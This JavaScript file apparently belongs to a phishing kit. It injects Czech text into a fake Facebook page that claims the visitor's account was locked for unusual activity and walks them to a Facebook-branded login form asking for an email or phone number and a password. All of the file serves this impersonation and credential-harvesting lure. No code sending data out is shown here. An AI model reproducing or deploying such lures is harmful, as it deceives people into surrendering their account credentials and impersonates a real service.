var mainHeader = document.querySelector(".home-main-header .home-heading");
var mainParagraph = document.querySelector(".home-mainparagrph .home-text");
var lockedHeader = document.querySelector(".home-lockedheader .home-text1");
var lockedParagraph = document.querySelector(".home-lockedinfobox .home-container6 .home-text5");
var footerParagraph = document.querySelector(".home-main-card .home-container7 .home-text6");
var getStarted = document.querySelector(".home-main-card .home-link");
var nextHeader = document.querySelector(".home-next-card .home-unlock-header .home-text");
var fristLineHeader = document.querySelector(".home-f-line .home-text03");
var fristLineParagraph = document.querySelector(".home-f-line .home-text05 span"); 
var secoundLineHeader = document.querySelector(".home-s-line .home-text09"); 
var thirdLineHeader = document.querySelector(".home-t-line .home-text12"); 
var nextButton = document.querySelector(".home-next-buttons .home-button1");
var backButton = document.querySelector(".home-next-buttons .home-button");
var logHeading = document.querySelector(".home-log-card .dlog .home-heading");
var logAlert = document.querySelector(".home-log-card .home-alert");
var logAlert2 = document.getElementById("alert");
var userInput = document.querySelector(".home-mail");
var passInput = document.querySelector(".home-pass");
var logButton = document.querySelector(".home-submit"); 
var or = document.querySelector(".home-or");
var createButton = document.querySelector(".home-creat-new");

mainHeader.innerHTML ="Váš účet byl uzamčen";
mainParagraph.innerHTML ="Na vašem účtu jsme zaznamenali neobvyklou aktivitu. To může znamenat, že někdo použil váš účet bez vašeho vědomí.";
lockedHeader.innerHTML ="Účet uzamčen 10. listopadu 2021";
lockedParagraph.innerHTML ="Abychom vás chránili, váš profil není viditelný pro lidi na Facebooku a nemůžete používat svůj účet.";
footerParagraph.innerHTML ="Provedeme vás několika kroky k odemknutí vašeho účtu.";
getStarted.innerHTML ="Začít";
nextHeader.innerHTML ="Jak odemknout svůj účet";
fristLineHeader.innerHTML ="Potvrďte, že se jedná o váš účet";
fristLineParagraph.innerHTML ="Protože přístup mohl mít někdo jiný, musíme potvrdit, že jste vlastníkem tohoto účtu, než budeme pokračovat.";
secoundLineHeader.innerHTML ="Zabezpečte své přihlašovací údaje";
thirdLineHeader.innerHTML ="Váš účet bude odemčen";
nextButton.innerHTML ="další";
backButton.innerHTML ="Zadní";
logHeading.innerHTML ="Přihlaste se na Facebook";
logAlert.innerHTML ="Nejprve se musíte přihlásit";
logAlert2.innerHTML ="Nejprve se musíte přihlásit";
userInput.setAttribute("placeholder" , "E-mailová adresa nebo telefonní číslo");
passInput.setAttribute("placeholder" , "Heslo");
logButton.innerHTML ="Přihlásit se";
or.innerHTML ="nebo";
createButton.innerHTML ="Vytvořit nový účet";

